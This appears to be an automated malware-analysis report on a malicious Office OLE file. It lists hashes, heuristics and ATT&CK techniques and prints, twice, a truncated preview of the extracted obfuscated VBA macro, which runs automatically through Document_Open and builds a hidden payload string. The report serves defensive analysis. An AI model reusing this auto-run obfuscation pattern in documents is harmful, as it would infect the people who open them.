Office (OLE) malware analysis — malicious · bc83cb7291eed86f

MALICIOUS

Office (OLE)

86.8 KB First seen: 2019-09-30

MD5: 365c2cd0df49f1e046e189f8104ce5e2 SHA-1: b47777707cfe8f58e113212cda3aad531b0f65c8 SHA-256: bc83cb7291eed86f3c80ccc841d9c1ef4a0ce9db16637cd2189c3383560cee95

102 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing VBA macros, with a high-confidence heuristic for a Document_Open macro. The VBA code is heavily obfuscated and truncated, but its presence and the 'Document_Open' subroutine indicate an attempt to execute code automatically when the document is opened. This is characteristic of macro-based malware delivery, likely intended to download and execute a second-stage payload.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 88,920 bytes but its declared streams total only 36,250 bytes — 52,670 bytes (59%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13822 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13822 bytes
SHA-256: `65892eb4e160e221bca7f85ebeeced35de9b09ab7d2be4db1bcff0a8a439f59a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "lsaNXrfDLvU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() If UqsrH >= whidk Then Dim CHDub() HAsQRW = PJQHL + smYFTV End If If lWPbXc >= 17 Then Dim Nmklq() YFEJj = OuzTq + NOCzs + pZPYIb + NIiwCD hXVKrm = HrmnCZ + JOHOu + wRGzw + dSzfzv End If If PsVqMo = 5 Then Dim WvUih() oVUiWk = GBJhW + OpwOA + ZYLaan + zlBuS End If If OlhBk >= 8 Then Dim KkjNin() zajYh = qHUdv + rCkdFH + LBBdHz + Vioszs TXZEcN = jNtHmH + caGbGr End If If EPjdOq <= WOFEP Then Dim QIDYWd() wiZWos = iBjYL + SvdhoH + pmBCH + DVPBv End If If wzZbD >= MTcjDG Then Dim fLYcu() fnHWVp = tDhQqA + CabfB + AUuRa + AVzOiz End If qjSwsRTb (BBbZinEi + AKzLoPq + wNmBjL + vfKIKfU + nGwiSlnEN + svTQklGvS + aKTjzrBzHz + vLhzDAI + cCcDwz + CTnXOPR + ipbElSEI + pCvVE) If NdOod > 4 Then Dim lpnXw() JzikwJ = bRrti + ZZBhm + njwabu + YiSPWJ End If If oYaGlk >= fRvDIS Then Dim uKAhzT() SJuwwk = JGkPDK + sEwcn + UJUnnt + LafWB wWPjK = zOWKLo + IaBGE + KjNIp + IFNYi End If If aksLtq >= 15 Then Dim mpPwpz() fCOXl = bQqvM + FlfEz End If End Sub Attribute VB_Name = "fHaURONz" Function BBbZinEi() If jQzVCd > 18 Then Dim IizLc() nvjzv = ucraj + hITsqz End If If CDkjp <> kUCAC Then Dim bzSmjD() FiXpp = cUVwP + wLSKkL KiSZZ = YvRiph + nauff End If aZpivAzl = "`ja ,S[7[L," + "@ [p[b[q [l[2:" + "[coQ[ o[-[W[ [#[8" + "[5[ [v[4[l" + "[ [+[DO[ [m[I[D" + "[ [b[3[n[ [" If MsPYm < 4 Then Dim DcJoi() jtpmEz = RRLlfO + EXQmf + QjzqD + nhUTH End If If rHcoI <> jvujwl Then Dim YXwhD() NMBCvt = MMDZO + PQKCp End If If GcukI > 18 Then Dim hOdBBG() JjFfLX = LLwvz + CKRwzD + YIdJmI + zImiv End If iOuXOVIsNM = "U[$[w[ [m[" + " [M[ [Us@[" + " %[=[?[ [T[4k " ZbCzDcowG = "[L[;[T[ [V[a?[ [([" + "F[ [ K@[H[ [9[M[f [" + "{[w[R[z[u[V[;[z`S" + "[1x[p%[e[g[ [W`" + "[_@[e[q[R[ [N^[_.[" + "j`[ ['[;[z[R[z`[8[1[" uGAJmz = "/[![h[H[A[W" + "[^[=[v[l[b[.[j[3o[+[" + "n[^[_[:[=[F[8[3[([y" + "O[I[4T[Q[+[a" BBbZinEi = aZpivAzl + iOuXOVIsNM + ZbCzDcowG + uGAJmz If JcNwL = jlZME Then Dim zVGqEj() FXWsVS = VINUGa + iEjoF + rTanqU + CuJUwJ End If If vmjriN = aXEFiP Then Dim QWBww() lzjBB = vbwtWw + ijSAw + XMtCjl + TkdnTz HwzCi = vSDbih + PljwW + WYrsu + QLOKw End If End Function Function AKzLoPq() If jGflP <> HjFIR Then Dim BcZiB() QOdoPG = CRijH + QEKZJ ziEzq = jbXzo + jJTuLt End If If ZiNAdA > CATqDQ Then Dim DwLQmV() ffDdsA = lVsRiS + OUEUqV End If If DIkUDF Xor ivGZK Then Dim CKWkAA() faZYw = pcHvwz + EcusXw PmzKEH = MKhkpV + udjLW + QubzK + LpaPdN End If LmvHFUzzhdM = "[cg[D$[3[!" + "[Y[H[h[ [U[Z[r" + "[j[9[^[4[b[ d[3[q[" If sdPUr <> dRZLG Then Dim iJwLhB() bULzAd = vluDXm + OCzUr tncBnD = cfbDwL + jjhfO End If If Oduilm = lpmVsl Then Dim KOAKrh() AVMptw = nrHaOa + VozXm aRDszD = LDIRKA + OHits End If If wwiuiL <= pZCnE Then Dim DjSTpp() njiqQ = ZBNGE + wRbSZz sdViF = FQzipO + ChtOQ + iPlMbT + IFSbQs End If If RrWWoU > THzrp Then Dim zorKJ() hTPJrH = ahiVU + AjcvG zijIYc = GpOso + VRJcB End If JPTOHibOVdX = "W[^[2[F[#e[" + "a[A[U[i[b[k" + "[ [h[R[e[Q" + "[l@" + """" + "[.s[U[E[k[a[" + "=[/[F[Y[_[8" + "[8B[1[D& [h[" If dRFcLK Eqv bXXrzc Then Dim XNClT() GQuKH = zzVOz + lFDbJn + USJpEb + jovONH End If hNTioI = "cO-[v[9[Q+[r[>[g`[[" + "1[![JS[][ S[([<[" + ")[![^[a[V[C" + "[4[y[W[j[;n[T4[1S[!" + "@[R[A%[w[l[b[" AKzLoPq = LmvHFUzzhdM + JPTOHibOVdX + hNTioI If NXuVpK <= GIawN Then Dim NvDPI() nwapjH = LCGApq + NqEOS + JRDjdc + JazLww ZumhL = AzzAI + IpJXrp + WpVttM + WflDv End If End Function Function wNmBjL() PZRfAWuwYV = "b[[x[Z[i[W[" + "X[q[f[0[{[r[CO[C" + "[.[a[$[c[:[^[u" + "[v[L[l[5[?[h[i[" If wTEWCE <= 12 Then Dim KTCYsU() ADHVBc = DBsVF + UOuEFt + qpSUm + kfBqUT En ... (truncated)

SHA-256: 65892eb4e160e221bca7f85ebeeced35de9b09ab7d2be4db1bcff0a8a439f59a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "lsaNXrfDLvU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
   If UqsrH >= whidk Then

Dim CHDub()
HAsQRW = PJQHL + smYFTV

End If
   If lWPbXc >= 17 Then

Dim Nmklq()
YFEJj = OuzTq + NOCzs + pZPYIb + NIiwCD
hXVKrm = HrmnCZ + JOHOu + wRGzw + dSzfzv

End If
   If PsVqMo = 5 Then

Dim WvUih()
oVUiWk = GBJhW + OpwOA + ZYLaan + zlBuS

End If
   If OlhBk >= 8 Then

Dim KkjNin()
zajYh = qHUdv + rCkdFH + LBBdHz + Vioszs
TXZEcN = jNtHmH + caGbGr

End If
   If EPjdOq <= WOFEP Then

Dim QIDYWd()
wiZWos = iBjYL + SvdhoH + pmBCH + DVPBv

End If
   If wzZbD >= MTcjDG Then

Dim fLYcu()
fnHWVp = tDhQqA + CabfB + AUuRa + AVzOiz

End If
qjSwsRTb (BBbZinEi + AKzLoPq + wNmBjL + vfKIKfU + nGwiSlnEN + svTQklGvS + aKTjzrBzHz + vLhzDAI + cCcDwz + CTnXOPR + ipbElSEI + pCvVE)
   If NdOod > 4 Then

Dim lpnXw()
JzikwJ = bRrti + ZZBhm + njwabu + YiSPWJ

End If
   If oYaGlk >= fRvDIS Then

Dim uKAhzT()
SJuwwk = JGkPDK + sEwcn + UJUnnt + LafWB
wWPjK = zOWKLo + IaBGE + KjNIp + IFNYi

End If
   If aksLtq >= 15 Then

Dim mpPwpz()
fCOXl = bQqvM + FlfEz

End If
End Sub


Attribute VB_Name = "fHaURONz"
Function BBbZinEi()
If jQzVCd > 18 Then

Dim IizLc()
nvjzv = ucraj + hITsqz

End If
   If CDkjp <> kUCAC Then

Dim bzSmjD()
FiXpp = cUVwP + wLSKkL
KiSZZ = YvRiph + nauff

End If
aZpivAzl = "`ja ,S[7[L," + "@ [p[b[q [l[2:" + "[coQ[ o[-[W[ [#[8" + "[5[ [v[4[l" + "[ [+[DO[ [m[I[D" + "[ [b[3[n[ ["
If MsPYm < 4 Then

Dim DcJoi()
jtpmEz = RRLlfO + EXQmf + QjzqD + nhUTH

End If
   If rHcoI <> jvujwl Then

Dim YXwhD()
NMBCvt = MMDZO + PQKCp

End If
   If GcukI > 18 Then

Dim hOdBBG()
JjFfLX = LLwvz + CKRwzD + YIdJmI + zImiv

End If
iOuXOVIsNM = "U[$[w[ [m[" + " [M[ [Us@[" + " %[=[?[ [T[4k "
ZbCzDcowG = "[L[;[T[ [V[a?[ [([" + "F[ [ K@[H[ [9[M[f [" + "{[w[R[z[u[V[;[z`S" + "[1x[p%*[e[g[ [W`" + "[_@[e[q[R[ [N^[_.[" + "j`[ ['[;[z[R[z`[8[1["
uGAJmz = "/[![h[H[A[W" + "[^[=[v[l[b[.[j[3o[+[" + "n[^[_[:[=[F[8[3[([y" + "O[I[4T[Q[+[a"
BBbZinEi = aZpivAzl + iOuXOVIsNM + ZbCzDcowG + uGAJmz
   If JcNwL = jlZME Then

Dim zVGqEj()
FXWsVS = VINUGa + iEjoF + rTanqU + CuJUwJ

End If
   If vmjriN = aXEFiP Then

Dim QWBww()
lzjBB = vbwtWw + ijSAw + XMtCjl + TkdnTz
HwzCi = vSDbih + PljwW + WYrsu + QLOKw

End If
End Function
Function AKzLoPq()
If jGflP <> HjFIR Then

Dim BcZiB()
QOdoPG = CRijH + QEKZJ
ziEzq = jbXzo + jJTuLt

End If
   If ZiNAdA > CATqDQ Then

Dim DwLQmV()
ffDdsA = lVsRiS + OUEUqV

End If
   If DIkUDF Xor ivGZK Then

Dim CKWkAA()
faZYw = pcHvwz + EcusXw
PmzKEH = MKhkpV + udjLW + QubzK + LpaPdN

End If
LmvHFUzzhdM = "[cg[D$[3[!" + "[Y[H[h[ [U[Z[r" + "[j[9[^[4[b[ d[3[q["
If sdPUr <> dRZLG Then

Dim iJwLhB()
bULzAd = vluDXm + OCzUr
tncBnD = cfbDwL + jjhfO

End If
   If Oduilm = lpmVsl Then

Dim KOAKrh()
AVMptw = nrHaOa + VozXm
aRDszD = LDIRKA + OHits

End If
   If wwiuiL <= pZCnE Then

Dim DjSTpp()
njiqQ = ZBNGE + wRbSZz
sdViF = FQzipO + ChtOQ + iPlMbT + IFSbQs

End If
   If RrWWoU > THzrp Then

Dim zorKJ()
hTPJrH = ahiVU + AjcvG
zijIYc = GpOso + VRJcB

End If
JPTOHibOVdX = "W[^[2[F[#e[" + "a[*A[U[i[b[*k" + "[ [h[R[e[Q" + "[l@" + """" + "[.s[U[E[*k[a[" + "=[/[F[Y[_[8" + "[8B[1[D& [h["
If dRFcLK Eqv bXXrzc Then

Dim XNClT()
GQuKH = zzVOz + lFDbJn + USJpEb + jovONH

End If
hNTioI = "cO-[v[9[Q+[r[>[g`[*[" + "1[![JS[][ S[([<[" + ")[![^[a[V[C" + "[4[y[W[j[;n[T4[1S[!" + "@[R[A%[w[l[b["
AKzLoPq = LmvHFUzzhdM + JPTOHibOVdX + hNTioI
   If NXuVpK <= GIawN Then

Dim NvDPI()
nwapjH = LCGApq + NqEOS + JRDjdc + JazLww
ZumhL = AzzAI + IpJXrp + WpVttM + WflDv

End If
End Function
Function wNmBjL()
PZRfAWuwYV = "b[*[x[Z[i[W[" + "X[q[f[0[{[r[CO[C" + "[.[a[$[c[:[^[u" + "[v[L[l[5[?[h[i["
If wTEWCE <= 12 Then

Dim KTCYsU()
ADHVBc = DBsVF + UOuEFt + qpSUm + kfBqUT

En
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.